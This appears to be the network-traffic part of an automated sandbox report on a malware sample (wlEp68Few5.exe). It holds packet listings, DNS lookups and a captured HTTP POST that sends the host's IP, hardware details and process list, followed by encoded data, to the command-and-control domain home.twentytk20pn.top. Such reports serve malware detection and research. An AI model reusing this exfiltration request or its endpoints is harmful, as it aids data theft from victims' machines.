                                                    Dec 19, 2024 08:33:33.381256104 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.381257057 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.381284952 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.381313086 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.381319046 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.381342888 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.381371975 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.381375074 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.381429911 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.381439924 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.381508112 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.381567955 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.381596088 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.381625891 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.381652117 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.381783962 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.381814003 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.381841898 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.381853104 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.381871939 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.381879091 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.381901979 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.381913900 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.381927013 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.381953955 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.381958008 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.381983995 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.382011890 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.382045031 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.382093906 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.382122993 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.382155895 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.382272005 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.384315968 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.384378910 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.388731956 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.388761044 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.388812065 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.388835907 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.400895119 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.400909901 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.401035070 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.415349960 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.415422916 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.415525913 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.415581942 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.415585995 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.415659904 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.415671110 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.415731907 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.442259073 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.442610025 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.450408936 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.450423956 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.450494051 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.450862885 CET4973280192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:33.454479933 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.454492092 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.454775095 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.454910994 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.454921007 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.455113888 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.458811045 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.489720106 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.492295980 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.492466927 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.492503881 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.492521048 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.492625952 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.492635965 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.492702007 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.492712975 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.492800951 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.492810965 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.492959976 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.494817972 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.494885921 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.494894981 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.495048046 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.495058060 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.495122910 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.495191097 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.495201111 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.495285034 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.495295048 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.495383024 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.495485067 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.495738029 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.495930910 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.495959044 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.496023893 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.498231888 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.498250008 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.498297930 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.498564959 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.498574018 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.498615980 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.498656988 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.498682022 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.498804092 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.498812914 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.498846054 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.498905897 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.498917103 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.498950958 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.498960972 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.499156952 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.499185085 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.499212027 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.499260902 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.499289036 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.499357939 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.499385118 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.499417067 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.499545097 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.499573946 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.499643087 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.499718904 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.499768972 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.499797106 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.499845028 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.499871969 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.500338078 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.500483036 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.500511885 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.500545025 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.500641108 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.500880003 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.500948906 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.500977039 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.501009941 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.501058102 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.501240015 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.501269102 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.501370907 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.501518011 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.501571894 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.501600027 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.501646996 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.501674891 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.501779079 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.501806974 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.501913071 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.501940966 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.502047062 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.502074957 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.502125978 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.502177000 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.502275944 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.502304077 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.502336979 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.502382994 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.502470970 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.502497911 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.502547026 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.502576113 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.502700090 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.502727032 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.502815008 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.502940893 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.502969027 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.503037930 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.503065109 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.503113985 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.503142118 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.503169060 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.503217936 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.503246069 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.503305912 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.503348112 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.503432989 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.503460884 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.503516912 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.503602028 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.503643036 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.503670931 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.503917933 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.503946066 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.503976107 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504004002 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504055977 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504084110 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504110098 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504162073 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504189014 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504216909 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504265070 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504292011 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504323959 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504422903 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504463911 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504492044 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504523039 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504571915 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504604101 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504631042 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504678965 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504709005 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504813910 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504842043 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.504956007 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.505038977 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.505065918 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.505178928 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.505206108 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.508363008 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.508392096 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.508424044 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.508476019 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.520559072 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.520606995 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.535517931 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.535550117 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.535603046 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.535634041 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.535661936 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.535975933 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.536005974 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.562148094 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.562176943 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.573983908 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.574012995 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.574064970 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.574094057 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.574157953 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.574186087 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.574218035 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.574377060 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.574404955 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.577872992 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.577902079 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.577954054 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.578006029 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.578038931 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.609438896 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.609539032 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.609723091 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:33.609952927 CET8049732194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:34.181176901 CET4973880192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:34.300721884 CET8049738194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:34.301350117 CET4973880192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:34.301673889 CET4973880192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:34.421154022 CET8049738194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:35.626431942 CET8049738194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:35.626528025 CET8049738194.87.47.113192.168.2.9
                                                    Dec 19, 2024 08:33:35.626590014 CET4973880192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:35.626918077 CET4973880192.168.2.9194.87.47.113
                                                    Dec 19, 2024 08:33:35.746489048 CET8049738194.87.47.113192.168.2.9

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Dec 19, 2024 08:33:28.023426056 CET6411253192.168.2.91.1.1.1
                                                    Dec 19, 2024 08:33:28.023499012 CET6411253192.168.2.91.1.1.1
                                                    Dec 19, 2024 08:33:28.322597027 CET53641121.1.1.1192.168.2.9
                                                    Dec 19, 2024 08:33:28.329827070 CET53641121.1.1.1192.168.2.9
                                                    Dec 19, 2024 08:33:31.589251995 CET6411553192.168.2.91.1.1.1
                                                    Dec 19, 2024 08:33:31.589317083 CET6411553192.168.2.91.1.1.1
                                                    Dec 19, 2024 08:33:31.881383896 CET53641151.1.1.1192.168.2.9
                                                    Dec 19, 2024 08:33:31.998164892 CET53641151.1.1.1192.168.2.9
                                                    Dec 19, 2024 08:33:34.042292118 CET6411753192.168.2.91.1.1.1
                                                    Dec 19, 2024 08:33:34.042416096 CET6411753192.168.2.91.1.1.1
                                                    Dec 19, 2024 08:33:34.179955959 CET53641171.1.1.1192.168.2.9
                                                    Dec 19, 2024 08:33:34.179975033 CET53641171.1.1.1192.168.2.9

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Dec 19, 2024 08:33:28.023426056 CET192.168.2.91.1.1.10x689fStandard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                    Dec 19, 2024 08:33:28.023499012 CET192.168.2.91.1.1.10xee69Standard query (0)httpbin.org28IN (0x0001)false
                                                    Dec 19, 2024 08:33:31.589251995 CET192.168.2.91.1.1.10x3e51Standard query (0)home.twentytk20pn.topA (IP address)IN (0x0001)false
                                                    Dec 19, 2024 08:33:31.589317083 CET192.168.2.91.1.1.10x6f52Standard query (0)home.twentytk20pn.top28IN (0x0001)false
                                                    Dec 19, 2024 08:33:34.042292118 CET192.168.2.91.1.1.10x9a1eStandard query (0)home.twentytk20pn.topA (IP address)IN (0x0001)false
                                                    Dec 19, 2024 08:33:34.042416096 CET192.168.2.91.1.1.10x89fcStandard query (0)home.twentytk20pn.top28IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Dec 19, 2024 08:33:28.322597027 CET1.1.1.1192.168.2.90x689fNo error (0)httpbin.org98.85.100.80A (IP address)IN (0x0001)false
                                                    Dec 19, 2024 08:33:28.322597027 CET1.1.1.1192.168.2.90x689fNo error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                    Dec 19, 2024 08:33:31.998164892 CET1.1.1.1192.168.2.90x3e51No error (0)home.twentytk20pn.top194.87.47.113A (IP address)IN (0x0001)false
                                                    Dec 19, 2024 08:33:34.179955959 CET1.1.1.1192.168.2.90x9a1eNo error (0)home.twentytk20pn.top194.87.47.113A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • httpbin.org
                                                    • home.twentytk20pn.top

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.949732194.87.47.113805960C:\Users\user\Desktop\wlEp68Few5.exe
                                                    TimestampBytes transferredDirectionData
                                                    Dec 19, 2024 08:33:32.120551109 CET12360OUTPOST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
                                                    Host: home.twentytk20pn.top
                                                    Accept: */*
                                                    Content-Type: application/json
                                                    Content-Length: 501502
                                                    Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 35 39 33 36 30 39 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                    Data Ascii: { "ip": "8.46.123.189", "current_time": "1734593609", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 584 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 880 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 436 }, { "name": "svchost.exe", "pid": 376 }, { "name": "svchost.exe", "pid": 792 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                                    Dec 19, 2024 08:33:32.240602016 CET19776OUTData Raw: 59 76 32 4e 75 63 53 66 46 34 63 5a 34 38 64 36 62 36 67 64 5c 2f 43 68 72 79 66 34 6f 5c 2f 38 41 42 49 58 39 6c 37 52 4c 66 77 6a 70 5c 2f 68 50 55 76 69 52 70 32 71 2b 4d 66 45 32 71 65 46 34 39 53 31 76 78 50 5a 36 78 61 61 57 79 66 44 62 34
                                                    Data Ascii: Yv2NucSfF4cZ48d6b6gd\/Chryf4o\/8ABIX9l7RLfwjp\/hPUviRp2q+MfE2qeF49S1vxPZ6xaaWyfDb4geKrG\/SwtdE0lriSHWfDGlpNFLdGKawkvYAiTSw3Nv8AmkPpyeEspRUsg8Q6cZSjGVSeUcOOFNSaTnJU+LJ1HGKfNJQhOdk+WMpWT\/XZ\/s7\/ABshCco8S+F9SUYSlGnDO+KVOo4q6hB1OC6dNSk7Ri6lSELtc
                                                    Dec 19, 2024 08:33:32.240669012 CET4944OUTData Raw: 50 4c 38 66 2b 41 44 62 50 6b 64 34 64 36 66 38 41 54 51 39 50 2b 6e 72 31 37 31 57 2b 37 39 78 5c 2f 6e 5c 2f 35 36 66 38 38 66 5c 2f 72 5c 2f 35 35 37 32 66 75 78 5c 2f 49 6d 4f 4d 66 76 2b 66 39 48 5c 2f 7a 32 36 5c 2f 6a 54 53 70 56 58 66 79
                                                    Data Ascii: PL8f+ADbPkd4d6f8ATQ9P+nr171W+79x\/n\/56f88f\/r\/5572fux\/ImOMfv+f9H\/z26\/jTSpVXfyekf8zWntPL8f8AgGgf7bfP5n7r93\/y19P8agj\/AOmn\/LP7P+7jB6f8\/Q\/zz1qaSPcqPvk+vmDjn7J7fYvxHSoY18v5ETyf3tx5Uf8Ar\/8Al1\/XnpxWYB\/f\/wCuXm5k\/L3\/AK+vrTP+Bxp\/y1+0evf
